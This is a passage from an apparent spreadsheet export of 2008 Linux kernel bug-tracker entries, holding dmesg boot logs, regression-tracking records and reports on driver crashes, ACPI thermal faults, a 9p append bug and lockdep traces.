of device 0000:00:1d.7 to 64 [ 2.134993] ehci_hcd 0000:00:1d.7: EHCI Host Controller [ 2.139029] ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 7 [ 2.147996] ehci_hcd 0000:00:1d.7: debug port 1 [ 2.150984] PCI: cache line size of 32 is not supported by device 0000:00:1d.7 [ 2.150990] ehci_hcd 0000:00:1d.7: irq 23, io mem 0xf7afb800 [ 2.402040] usb 5-1: new full speed USB device using uhci_hcd and address 2 [ 2.171128] ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 [ 2.175182] usb usb7: configuration #1 chosen from 1 choice [ 2.179128] hub 7-0:1.0: USB hub found [ 2.183106] hub 7-0:1.0: 6 ports detected [ 2.289847] usb usb7: New USB device found, idVendor=1d6b, idProduct=0002 [ 2.293761] usb usb7: New USB device strings: Mfr=3, Product=2, SerialNumber=1 [ 2.297760] usb usb7: Product: EHCI Host Controller [ 2.301763] usb usb7: Manufacturer: Linux 2.6.25-1-amd64 ehci_hcd [ 2.305761] usb usb7: SerialNumber: 0000:00:1d.7 [ 2.568363] ACPI: PCI Interrupt 0000:06:01.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 2.652351] firewire_ohci: Added fw-ohci device 0000:06:01.0, OHCI version 1.0 [ 2.399114] ahci 0000:00:1f.2: version 3.0 [ 2.399138] ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 2.861313] usb 1-1: USB disconnect, address 2 [ 3.104916] usb 1-1: new full speed USB device using uhci_hcd and address 3 [ 2.894012] firewire_core: created device fw0: GUID 00e018000386e6a5, S400 [ 3.282965] usb 1-1: configuration #1 chosen from 1 choice [ 3.031978] usb 1-1: New USB device found, idVendor=147e, idProduct=2016 [ 3.035790] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 3.039788] usb 1-1: Product: Fingerprint Sensor [ 3.043786] usb 1-1: Manufacturer: TouchStrip [ 3.407929] ahci 0000:00:1f.2: AHCI 0001.0100 32 slots 3 ports 3 Gbps 0x7 impl SATA mode [ 3.411894] ahci 0000:00:1f.2: flags: 64bit ncq sntf pm led clo pio slum part [ 3.415898] PCI: Setting latency timer of device 0000:00:1f.2 to 64 [ 3.416116] scsi0 : ahci [ 3.419964] scsi1 : ahci [ 3.423945] scsi2 : ahci [ 3.427963] ata1: SATA max UDMA/133 abar m2048@0xf7afb000 port 0xf7afb100 irq 1275 [ 3.431895] ata2: SATA max UDMA/133 abar m2048@0xf7afb000 port 0xf7afb180 irq 1275 [ 3.435897] ata3: SATA max UDMA/133 abar m2048@0xf7afb000 port 0xf7afb200 irq 1275 [ 3.526613] usb 7-6: new high speed USB device using ehci_hcd and address 3 [ 3.947187] usb 7-6: configuration #1 chosen from 1 choice [ 3.952235] usb 7-6: New USB device found, idVendor=05e3, idProduct=0503 [ 3.955191] usb 7-6: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [ 3.959194] usb 7-6: Product: USB 2.0 PC Camera [ 4.174718] ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 4.185452] ata1.00: ATA-7: SAMSUNG HM160JI, AD100-11, max UDMA/100 [ 4.185454] ata1.00: 312581808 sectors, multi 16: LBA48 NCQ (depth 31/32) [ 4.194298] usb 5-1: new full speed USB device using uhci_hcd and address 3 [ 4.198419] ata1.00: configured for UDMA/100 [ 4.183652] usb 5-1: configuration #1 chosen from 1 choice [ 4.187985] usb 5-1: New USB device found, idVendor=0b05, idProduct=1712 [ 4.191658] usb 5-1: New USB device strings: Mfr=0, Product=0, SerialNumber=3 [ 4.195656] usb 5-1: SerialNumber: 0194E8-5B-0002 [ 4.514318] ata2: SATA link down (SStatus 0 SControl 300) [ 4.828048] ata3: SATA link down (SStatus 0 SControl 300) [ 4.575099] scsi 0:0:0:0: Direct-Access ATA SAMSUNG HM160JI AD10 PQ: 0 ANSI: 5 [ 4.575186] ACPI: PCI Interrupt 0000:02:00.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 5.583493] ahci 0000:02:00.0: AHCI 0001.0000 32 slots 1 ports 3 Gbps 0x1 impl SATA mode [ 5.587455] ahci 0000:02:00.0: flags: 64bit ncq pm led clo pmp pio slum part [ 5.591457] PCI: Setting latency timer of device 0000:02:00.0 to 64 [ 5.591548] scsi3 : ahci [ 5.595485] ata4: SATA max UDMA/133 abar m8192@0xf7efe000 port 0xf7efe100 irq 19 [ 6.184688] ata4: SATA link down (SStatus 0 SControl 300) [ 6.193684] ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; GSI 16 (leve</t>
  </si>
  <si>
    <t>kernel crash on Realtek RTL8101E ethernet controller</t>
  </si>
  <si>
    <t>2.6.24-16 (ubuntu 8.04)</t>
  </si>
  <si>
    <t>2008-05-10 15:56 UTC</t>
  </si>
  <si>
    <t>2008-06-09 14:08 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Ubuntu 8.04 Hardware Environment: Thoshiba Satellite Notebook Software Environment: Ubuntu alternate i386 installation Problem Description: Hi, I just tried to install Ubuntu 8.04 with the i386 alternate CD on a brand new Toshiba Satellite Notebook. Installation reproducibly fails due to a kernel crash at the moment when the r8169 driver is inserted. I'll attach dmesg and lspci output. regards Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.26-rc1 regression: ISA DMA broken (bisected)</t>
  </si>
  <si>
    <t>2008-05-11 13:01 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 regression: ISA DMA broken (bisected) Submitter : Rene Herman &lt;rene.herman@keyaccess.nl&gt; Date : 2008-05-09 1:37 References : http://marc.info/?l=linux-kernel&amp;m=121029711005560&amp;w=4 Handled-By : Takashi Iwai &lt;tiwai@suse.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121032355203154&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>/proc/kallsyms broken in 2.6.26-rc1-git6</t>
  </si>
  <si>
    <t>2.6.26-rc1-git6</t>
  </si>
  <si>
    <t>2008-05-11 13:12 UTC</t>
  </si>
  <si>
    <t>2008-05-19 14:15 UTC</t>
  </si>
  <si>
    <t>Subject : /proc/kallsyms broken in 2.6.26-rc1-git6 Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2008-05-09 17:41 References : http://marc.info/?l=linux-kernel&amp;m=121035508420184&amp;w=4 Handled-By : Paulo Marques &lt;pmarques@grupopie.com&gt; Handled-By : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ppc compile failure (__flush_icache_range etc undeclared)</t>
  </si>
  <si>
    <t>2008-05-11 13:20 UTC</t>
  </si>
  <si>
    <t>2008-05-14 14:38 UTC</t>
  </si>
  <si>
    <t>Subject : ppc compile failure (__flush_icache_range etc undeclared) Submitter : Meelis Roos &lt;mroos@linux.ee&gt; Date : 2008-05-10 11:51 References : http://marc.info/?l=linux-kernel&amp;m=121042037427529&amp;w=4 Handled-By : Josh Boyer &lt;jwboyer@linux.vnet.ibm.com&gt; Handled-By : Segher Boessenkool &lt;segher@kernel.crashing.org&gt; Patch : http://ozlabs.org/pipermail/linuxppc-dev/2008-May/056007.html Patch : http://ozlabs.org/pipermail/linuxppc-dev/2008-May/056008.html This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>x86: ld: warning: dot moved backwards before `.text'</t>
  </si>
  <si>
    <t>2008-05-11 13:24 UTC</t>
  </si>
  <si>
    <t>2008-05-14 13:51 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 on x86: ld: warning: dot moved backwards before `.text' Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-05-10 20:18 References : http://marc.info/?l=linux-kernel&amp;m=121045079732174&amp;w=4 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; Handled-By : Sam Ravnborg &lt;sam@ravnborg.org&gt; Handled-By : Cyrill Gorcunov &lt;gorcunov@gmail.com&gt; Handled-By : Pavel Machek &lt;pavel@suse.cz&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Error in save_stack_trace() on x86_64?</t>
  </si>
  <si>
    <t>2008-05-11 13:29 UTC</t>
  </si>
  <si>
    <t>2008-07-19 03:07 UTC</t>
  </si>
  <si>
    <t>Subject : Error in save_stack_trace() on x86_64? Submitter : "Vegard Nossum" &lt;vegard.nossum@gmail.com&gt; Date : 2008-05-11 13:09 References : http://marc.info/?l=linux-kernel&amp;m=121051140821821&amp;w=4 Handled-By : "Arjan van de Ven" &lt;arjan@linux.intel.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t xml:space="preserve"> pcspkr: fix dependancies breaks artsd</t>
  </si>
  <si>
    <t>2008-05-11 13:38 UTC</t>
  </si>
  <si>
    <t>2008-05-19 14:16 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 regression: e5e1d3cb20034a3cbcfff1f0bae12201aa2ce17e breaks artsd Submitter : Roberto Oppedisano &lt;roberto.oppedisano@infracom.it&gt; Date : 2008-05-11 20:15 References : http://lkml.org/lkml/2008/5/11/118 Handled-By : Stas Sergeev &lt;stsp@aknet.ru&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bonding with arp_interval very low =&gt; Ooops.</t>
  </si>
  <si>
    <t>2008-05-11 13:51 UTC</t>
  </si>
  <si>
    <t>Nicolas 2P</t>
  </si>
  <si>
    <t>2008-07-21 01:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: don't know. Earliest failing kernel version: don't know. Distribution: debian Hardware Environment: Tested on x86 and amd64, 5 different hardware. Software Environment: Problem Description: Setting arp_interval to a very low value (2) =&gt; Ooops. Steps to reproduce: # modprobe bonding # echo 2 &gt; /sys/class/net/bond0/bonding/arp_interval # ifconfig bond0 up Alternate steps to reproduce: in /etc/modprobe.conf : alias bond0 bonding options bond0 arp_interval=2 arp_ip_target=192.168.0.254 # ifconfig bond0 up</t>
  </si>
  <si>
    <t>critical thermal shutdown regression 2.6.26-rc1 - HP Pavilion dv6700</t>
  </si>
  <si>
    <t>2008-05-12 20:04 UTC</t>
  </si>
  <si>
    <t>2008-10-24 22:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26-rc1 In 2.6.25 we got this: ACPI Exception (thermal-0365): AE_BAD_DATA, No critical threshold [20070126] and /proc/acpi/thermal_zone was empty In 2.6.26-rc1 we got this: /proc/acpi/thermal_zone/THR1/cooling_mode:&lt;setting not supported&gt; /proc/acpi/thermal_zone/THR1/polling_frequency:&lt;polling disabled&gt; /proc/acpi/thermal_zone/THR1/state:state: critical /proc/acpi/thermal_zone/THR1/temperature:temperature: 50 C /proc/acpi/thermal_zone/THR1/trip_points:critical (S5): -73 C &lt;disabled&gt; /proc/acpi/thermal_zone/THR1/trip_points:hot (S4): 120 C &lt;disabled&gt; /proc/acpi/thermal_zone/THR1/trip_points:passive: 92 C: tc1=2 tc2=3 tsp=30 devices=CPU0 CPU1 though the system was booted with thermal.nocrt=1 in order to disable the critical trip point -- else the system would reboot... The AML for _CRT is clearly broken. Interestingly, for non Windows 2006, it appears that _HOT is broken too: Store (0x07D0, OSYS) If (CondRefOf (_OSI, Local0)) { If (_OSI ("Linux")) { Store (One, LINX) } If (_OSI ("Windows 2001")) { Store (0x07D1, OSYS) } If (_OSI ("Windows 2001 SP1")) { Store (0x07D1, OSYS) } If (_OSI ("Windows 2001 SP2")) { Store (0x07D2, OSYS) } If (_OSI ("Windows 2006")) { Store (0x07D6, OSYS) } } ... Method (_HOT, 0, Serialized) { If (LEqual (OSYS, 0x07D6)) { If (LEqual (\_SB.TJ85, Zero)) { Return (Add (0x0AAC, Multiply (TPC, 0x0A))) } Else { Return (Add (0x0AAC, Multiply (TP85, 0x0A))) } } } Method (_CRT, 0, Serialized) { If (LLess (OSYS, 0x07D6)) { If (LEqual (\_SB.TJ85, Zero)) { Return (Add (0x0AAC, Multiply (TPC, 0x0A))) } Else { Return (Add (0x0AAC, Multiply (TP85, 0x0A))) } } } So it appears that in the interest of being "bug compatible" and conjuring up an "implicit return" here, we conjured up a value that tubed the system when we should have disabled _CRT (if not the entire thermal zone).</t>
  </si>
  <si>
    <t>9p: O_APPEND not supported?</t>
  </si>
  <si>
    <t>2008-05-13 08:12 UTC</t>
  </si>
  <si>
    <t>sqweek</t>
  </si>
  <si>
    <t>2010-01-28 14:56 UTC</t>
  </si>
  <si>
    <t>u9fs on the server side zsh; echo hello world &gt;tmp zsh; echo hi &gt;&gt;tmp zsh; cat tmp hi lo world So it hasn't truncated the file, but has started writing at zero offset instead of the end of file. bash, dash, tcsh and zsh all exhibit the behaviour, but it works fine in p9p's rc (which I'd wager is thanks to lib9, as it explicitly seeks). strace says: bash: open("t", O_WRONLY|O_CREAT|O_APPEND|O_LARGEFILE, 0666) = 3 dash: open("t", O_WRONLY|O_CREAT|O_APPEND|O_LARGEFILE, 0666) = 3 tcsh: open("t", O_WRONLY|O_APPEND|O_LARGEFILE) = 3 zsh: open("t", O_WRONLY|O_CREAT|O_NOCTTY|O_APPEND, 0666) = 3 rc: open("t", O_WRONLY|O_LARGEFILE) = 5 _llseek(5, 0, [12], SEEK_END) = 0 -sqweek</t>
  </si>
  <si>
    <t>[PATCH] Add support for Apple USB Ethernet Adapter</t>
  </si>
  <si>
    <t>2.6.25.3</t>
  </si>
  <si>
    <t>2008-05-13 09:05 UTC</t>
  </si>
  <si>
    <t>Aurelien Nephtali</t>
  </si>
  <si>
    <t>2010-01-25 16:18 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: Apple USB Ethernet Adapter Problem Description: The attached patch adds support for the Apple USB Ethernet Adapter. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID?nplm=MB442Z/A</t>
  </si>
  <si>
    <t>no AC status notification</t>
  </si>
  <si>
    <t>2.6.24.7</t>
  </si>
  <si>
    <t>2008-05-14 08:16 UTC</t>
  </si>
  <si>
    <t>Alex Fiestas</t>
  </si>
  <si>
    <t>2008-10-16 22:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.22 Earliest failing kernel version: Distribution: Mandriva Hardware Environment: Sony vaio fz315s Problem Description: When the ac_adapter is disconnected, acpi in theory should generate 2 events, ac_adapter AC 00000080 00000000 battery BAT0 00000080 00000001 but in my case it only generates the BAT0 event. Steps to reproduce: Install a 2.6.24 kernel, execute acpi_listen and plug/unplug the ac_adapter.</t>
  </si>
  <si>
    <t>device name conflicts in sysfs with bonding</t>
  </si>
  <si>
    <t>2008-05-14 14:36 UTC</t>
  </si>
  <si>
    <t>2008-11-17 06:39 UTC</t>
  </si>
  <si>
    <t>Renaming device to bonding_masters causes sysfs problems: The check for device rename assumes that /sys/class/net is not polluted by non-device entries like /sys/class/net/bonding_masters To reproduce: # modprobe dummy # modprobe bonding # ip li set dummy0 name bonding_master Backtrace:[17185141.057441] sysfs: duplicate filename 'bonding_masters' can not be created [17185141.057452] ------------[ cut here ]------------ [17185141.057455] WARNING: at fs/sysfs/dir.c:425 sysfs_add_one+0x99/0xc0() [17185141.057457] Modules linked in: bonding dummy af_packet i915 drm kvm_intel kvm acpi_cpufreq cpufreq_conservative cpufreq_stats cpufreq_ondemand freq_table cpufreq_powersave cpufreq_userspace sbs video output sbshc container wmi battery ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack ipv6 iptable_filter ip_tables x_tables ac tun snd_hda_intel snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_pcsp evdev snd_seq snd_pcm_oss snd_mixer_oss sky2 iTCO_wdt snd_seq_device usbhid serio_raw snd_pcm iTCO_vendor_support hid snd_timer psmouse snd shpchp button intel_agp soundcore pci_hotplug snd_page_alloc ext3 jbd mbcache sr_mod cdrom sd_mod sg ata_generic ata_piix pata_acpi libata floppy scsi_mod dock ehci_hcd r8169 uhci_hcd usbcore thermal processor fan fuse [17185141.057521] Pid: 7745, comm: ip Not tainted 2.6.26-rc2 #66 [17185141.057523] [17185141.057523] Call Trace: [17185141.057534] [&lt;ffffffff8023969f&gt;] warn_on_slowpath+0x5f/0x80 [17185141.057541] [&lt;ffffffff8023a817&gt;] ? printk+0x67/0x70 [17185141.057549] [&lt;ffffffff80301020&gt;] ? sysfs_ilookup_test+0x0/0x20 [17185141.057555] [&lt;ffffffff802c5448&gt;] ? ifind+0x58/0xc0 [17185141.057559] [&lt;ffffffff80301020&gt;] ? sysfs_ilookup_test+0x0/0x20 [17185141.057566] [&lt;ffffffff80301399&gt;] sysfs_add_one+0x99/0xc0 [17185141.057572] [&lt;ffffffff803023b8&gt;] sysfs_create_link+0xa8/0x130 [17185141.057581] [&lt;ffffffff803b74a6&gt;] device_rename+0xc6/0x150 [17185141.057589] [&lt;ffffffff803e5c5d&gt;] dev_change_name+0xcd/0x230 [17185141.057596] [&lt;ffffffff803ee9d0&gt;] do_setlink+0x370/0x390 [17185141.057603] [&lt;ffffffff80400027&gt;] ? nla_parse+0x97/0xf0 [17185141.057610] [&lt;ffffffff803f00b8&gt;] rtnl_newlink+0x358/0x490 [17185141.058619] [&lt;ffffffff803ef8ca&gt;] rtnetlink_rcv_msg+0x1ea/0x230 [17185141.058623] [&lt;ffffffff803ef6e0&gt;] ? rtnetlink_rcv_msg+0x0/0x230 [17185141.058628] [&lt;ffffffff803fe289&gt;] netlink_rcv_skb+0x89/0xb0 [17185141.058634] [&lt;ffffffff803ef6d0&gt;] rtnetlink_rcv+0x20/0x30 [17185141.058638] [&lt;ffffffff803fe023&gt;] netlink_unicast+0x273/0x2b0 [17185141.058643] [&lt;ffffffff803dec01&gt;] ? __alloc_skb+0x91/0x150 [17185141.058649] [&lt;ffffffff803fe8f4&gt;] netlink_sendmsg+0x224/0x2d0 [17185141.058657] [&lt;ffffffff803fe02b&gt;] ? netlink_unicast+0x27b/0x2b0 [17185141.058664] [&lt;ffffffff803d76a7&gt;] sock_sendmsg+0x127/0x140 [17185141.058675] [&lt;ffffffff8024f2f0&gt;] ? autoremove_wake_function+0x0/0x40 [17185141.058685] [&lt;ffffffff802842f7&gt;] ? __alloc_pages_internal+0xd7/0x4b0 [17185141.058695] [&lt;ffffffff803d81e7&gt;] ? move_addr_to_kernel+0x57/0x60 [17185141.058699] [&lt;ffffffff803e02ec&gt;] ? verify_iovec+0x3c/0xc0 [17185141.058705] [&lt;ffffffff803d7867&gt;] sys_sendmsg+0x1a7/0x2f0 [17185141.058723] [&lt;ffffffff80469530&gt;] ? do_page_fault+0x430/0xac0 [17185141.058728] [&lt;ffffffff8029537d&gt;] ? do_brk+0x1ed/0x2a0 [17185141.058743] [&lt;ffffffff8020c4da&gt;] system_call_after_swapgs+0x8a/0x8f [17185141.058751] [17185141.058753] ---[ end trace bc97cbadd0054499 ]--- [17185141.058758] net bonding_masters: device_rename: sysfs_create_symlink failed (-17)</t>
  </si>
  <si>
    <t>snd_pcsp lockdep warning</t>
  </si>
  <si>
    <t>2.6.26-rc2</t>
  </si>
  <si>
    <t>2008-05-15 03:43 UTC</t>
  </si>
  <si>
    <t>2008-05-20 12:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.26-rc2 Distribution: Gentoo Hardware Environment: Intel 965 chipset, Core 2 Duo Software Environment: mplayer Problem Description: Just lockdep warning in dmesg Steps to reproduce: while playing HD video got this. [52478.405955] ======================================================= [52478.405955] [ INFO: possible circular locking dependency detected ] [52478.405955] 2.6.26-rc2-devel #1 [52478.405955] ------------------------------------------------------- [52478.405955] mplayer/4814 is trying to acquire lock: [52478.405955] (&amp;pcsp_chip.substream_lock){++..}, at: [&lt;f88af285&gt;] pcsp_do_timer+0x51/0x2a8 [snd_pcsp] [52478.405955] [52478.405955] but task is already holding lock: [52478.405955] (&amp;cpu_base-&gt;lock){++..}, at: [&lt;c0136ac4&gt;] hrtimer_interrupt+0x6c/0x154 [52478.405955] [52478.405955] which lock already depends on the new lock. [52478.405955] [52478.405955] [52478.405955] the existing dependency chain (in reverse order) is: [52478.405955] [52478.405955] -&gt; #5 (&amp;cpu_base-&gt;lock){++..}: [52478.405955] [&lt;c013fc8e&gt;] __lock_acquire+0x982/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;c030783a&gt;] _spin_lock_irqsave+0x25/0x55 [52478.405955] [&lt;c01366c2&gt;] lock_hrtimer_base+0x18/0x33 [52478.405955] [&lt;c01367aa&gt;] hrtimer_start+0x19/0x100 [52478.405955] [&lt;c011b656&gt;] enqueue_rt_entity+0xf7/0x10e [52478.405955] [&lt;c011b6cb&gt;] enqueue_task_rt+0x36/0x4a [52478.405955] [&lt;c0118235&gt;] enqueue_task+0x4c/0x58 [52478.405955] [&lt;c011825a&gt;] activate_task+0x19/0x1f [52478.405955] [&lt;c011a9f7&gt;] try_to_wake_up+0x17c/0x1be [52478.405955] [&lt;c011aa61&gt;] wake_up_process+0xf/0x11 [52478.405955] [&lt;c0303060&gt;] migration_call+0xb4/0x403 [52478.405955] [&lt;c0440d1b&gt;] migration_init+0x38/0x45 [52478.405955] [&lt;c043439b&gt;] kernel_init+0x49/0x22a [52478.405955] [&lt;c01045af&gt;] kernel_thread_helper+0x7/0x10 [52478.405955] [&lt;ffffffff&gt;] 0xffffffff [52478.405955] [52478.405955] -&gt; #4 (&amp;rt_b-&gt;rt_runtime_lock){++..}: [52478.405955] [&lt;c013fc8e&gt;] __lock_acquire+0x982/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;c030748f&gt;] _spin_lock+0x1c/0x49 [52478.405955] [&lt;c011b613&gt;] enqueue_rt_entity+0xb4/0x10e [52478.405955] [&lt;c011b6cb&gt;] enqueue_task_rt+0x36/0x4a [52478.405955] [&lt;c0118235&gt;] enqueue_task+0x4c/0x58 [52478.405955] [&lt;c011825a&gt;] activate_task+0x19/0x1f [52478.405955] [&lt;c011a9f7&gt;] try_to_wake_up+0x17c/0x1be [52478.405955] [&lt;c011aa61&gt;] wake_up_process+0xf/0x11 [52478.405955] [&lt;c0303060&gt;] migration_call+0xb4/0x403 [52478.405955] [&lt;c0440d1b&gt;] migration_init+0x38/0x45 [52478.405955] [&lt;c043439b&gt;] kernel_init+0x49/0x22a [52478.405955] [&lt;c01045af&gt;] kernel_thread_helper+0x7/0x10 [52478.405955] [&lt;ffffffff&gt;] 0xffffffff [52478.405955] [52478.405955] -&gt; #3 (&amp;rq-&gt;rq_lock_key){++..}: [52478.405955] [&lt;c013fc8e&gt;] __lock_acquire+0x982/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;c030748f&gt;] _spin_lock+0x1c/0x49 [52478.405955] [&lt;c011a634&gt;] task_rq_lock+0x36/0x5d [52478.405955] [&lt;c011a8a5&gt;] try_to_wake_up+0x2a/0x1be [52478.405955] [&lt;c011aa44&gt;] default_wake_function+0xb/0xd [52478.405955] [&lt;c0117dad&gt;] __wake_up_common+0x2f/0x5a [52478.405955] [&lt;c0119c2a&gt;] complete+0x2b/0x3e [52478.405955] [&lt;c0133b93&gt;] kthread+0x1f/0x64 [52478.405955] [&lt;c01045af&gt;] kernel_thread_helper+0x7/0x10 [52478.405955] [&lt;ffffffff&gt;] 0xffffffff [52478.405955] [52478.405955] -&gt; #2 (&amp;q-&gt;lock){++..}: [52478.405955] [&lt;c013fc8e&gt;] __lock_acquire+0x982/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;c030783a&gt;] _spin_lock_irqsave+0x25/0x55 [52478.405955] [&lt;c0119c96&gt;] __wake_up+0x15/0x3b [52478.405955] [&lt;f88c6f2d&gt;] snd_pcm_post_stop+0x51/0x5a [snd_pcm] [52478.405955] [&lt;f88c6353&gt;] snd_pcm_action_single+0x33/0x4b [snd_pcm] [52478.405955] [&lt;f88c7238&gt;] snd_pcm_action+0x68/0x74 [snd_pcm] [52478.405955] [&lt;f88c7268&gt;] snd_pcm_stop+0x11/0x13 [snd_pcm] [52478.405955] [&lt;f88c7302&gt;] snd_pcm_drop+0x98/0xbb [snd_pcm] [52478.405955] [&lt;f88c9cf0&gt;] snd_pcm_common_ioctl1+0xe7c/0xf6d [snd_pcm] [52478.405955] [&lt;f88ca4a3&gt;] snd_pcm_playback_ioctl1+0x355/0x36c [snd_pcm] [52478.405955] [&lt;f88ca4f2&gt;] snd_pcm_kernel_ioctl+0x38/0x5d [snd_pcm] [52478.405955] [&lt;f89fc93e&gt;] snd_pcm_oss_change_params+0xaee/0xea7 [snd_pcm_oss] [52478.405955] [&lt;f89fd04f&gt;] snd_pcm_oss_get_active_substream+0x34/0x4c [snd_pcm_oss] [52478.405955] [&lt;f89fd075&gt;] snd_pcm_oss_get_format+0xe/0x20 [snd_pcm_oss] [52478.405955] [&lt;f89fe246&gt;] snd_pcm_oss_ioctl+0x3c0/0x9a5 [snd_pcm_oss] [52478.405955] [&lt;c0179202&gt;] vfs_ioctl+0x22/0x67 [52478.405955] [&lt;c01794ab&gt;] do_vfs_ioctl+0x264/0x27b [52478.405955] [&lt;c01794ee&gt;] sys_ioctl+0x2c/0x46 [52478.405955] [&lt;c01038b9&gt;] sysenter_past_esp+0x6a/0xb1 [52478.405955] [&lt;ffffffff&gt;] 0xffffffff [52478.405955] [52478.405955] -&gt; #1 (&amp;substream-&gt;self_group.lock){.+..}: [52478.405955] [&lt;c013fc8e&gt;] __lock_acquire+0x982/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;c030748f&gt;] _spin_lock+0x1c/0x49 [52478.405955] [&lt;f88af2b3&gt;] pcsp_do_timer+0x7f/0x2a8 [snd_pcsp] [52478.405955] [&lt;c0136372&gt;] run_hrtimer_pending+0x3a/0xcb [52478.405955] [&lt;c0136419&gt;] run_hrtimer_softirq+0x16/0x18 [52478.405955] [&lt;c0127f51&gt;] __do_softirq+0x6f/0xe9 [52478.405955] [&lt;c01059c3&gt;] do_softirq+0x5e/0xa8 [52478.405955] [&lt;ffffffff&gt;] 0xffffffff [52478.405955] [52478.405955] -&gt; #0 (&amp;pcsp_chip.substream_lock){++..}: [52478.405955] [&lt;c013fbb5&gt;] __lock_acquire+0x8a9/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;c030783a&gt;] _spin_lock_irqsave+0x25/0x55 [52478.405955] [&lt;f88af285&gt;] pcsp_do_timer+0x51/0x2a8 [snd_pcsp] [52478.405955] [&lt;c0136311&gt;] __run_hrtimer+0x49/0x70 [52478.405955] [&lt;c0136b43&gt;] hrtimer_interrupt+0xeb/0x154 [52478.405955] [&lt;c0110670&gt;] smp_apic_timer_interrupt+0x6c/0x80 [52478.405955] [&lt;c0104417&gt;] apic_timer_interrupt+0x33/0x38 [52478.405955] [&lt;f89ff159&gt;] snd_pcm_plug_write_transfer+0x75/0x9f [snd_pcm_oss] [52478.405955] [&lt;f89fb6d8&gt;] snd_pcm_oss_write2+0x82/0xc0 [snd_pcm_oss] [52478.405955] [&lt;f89fcfb6&gt;] snd_pcm_oss_write+0x165/0x1ca [snd_pcm_oss] [52478.405955] [&lt;c016f557&gt;] vfs_write+0x8c/0x108 [52478.405955] [&lt;c016faee&gt;] sys_write+0x3b/0x60 [52478.405955] [&lt;c01038b9&gt;] sysenter_past_esp+0x6a/0xb1 [52478.405955] [&lt;ffffffff&gt;] 0xffffffff [52478.405955] [52478.405955] other info that might help us debug this: [52478.405955] [52478.405955] 2 locks held by mplayer/4814: [52478.405955] #0: (&amp;runtime-&gt;oss.params_lock){--..}, at: [&lt;f89fceb7&gt;] snd_pcm_oss_write+0x66/0x1ca [snd_pcm_oss] [52478.405955] #1: (&amp;cpu_base-&gt;lock){++..}, at: [&lt;c0136ac4&gt;] hrtimer_interrupt+0x6c/0x154 [52478.405955] [52478.405955] stack backtrace: [52478.405955] Pid: 4814, comm: mplayer Not tainted 2.6.26-rc2-devel #1 [52478.405955] [&lt;c013de71&gt;] print_circular_bug_tail+0x5b/0x66 [52478.405955] [&lt;c013fbb5&gt;] __lock_acquire+0x8a9/0xb37 [52478.405955] [&lt;c013feaf&gt;] lock_acquire+0x6c/0x89 [52478.405955] [&lt;f88af285&gt;] ? pcsp_do_timer+0x51/0x2a8 [snd_pcsp] [52478.405955] [&lt;c030783a&gt;] _spin_lock_irqsave+0x25/0x55 [52478.405955] [&lt;f88af285&gt;] ? pcsp_do_timer+0x51/0x2a8 [snd_pcsp] [52478.405955] [&lt;f88af234&gt;] ? pcsp_do_timer+0x0/0x2a8 [snd_pcsp] [52478.405955] [&lt;f88af285&gt;] pcsp_do_timer+0x51/0x2a8 [snd_pcsp] [52478.405955] [&lt;c0136134&gt;] ? __remove_hrtimer+0x62/0x6a [52478.405955] [&lt;f88af234&gt;] ? pcsp_do_timer+0x0/0x2a8 [snd_pcsp] [52478.405955] [&lt;c0136311&gt;] __run_hrtimer+0x49/0x70 [52478.405955] [&lt;c0136b43&gt;] hrtimer_interrupt+0xeb/0x154 [52478.405955] 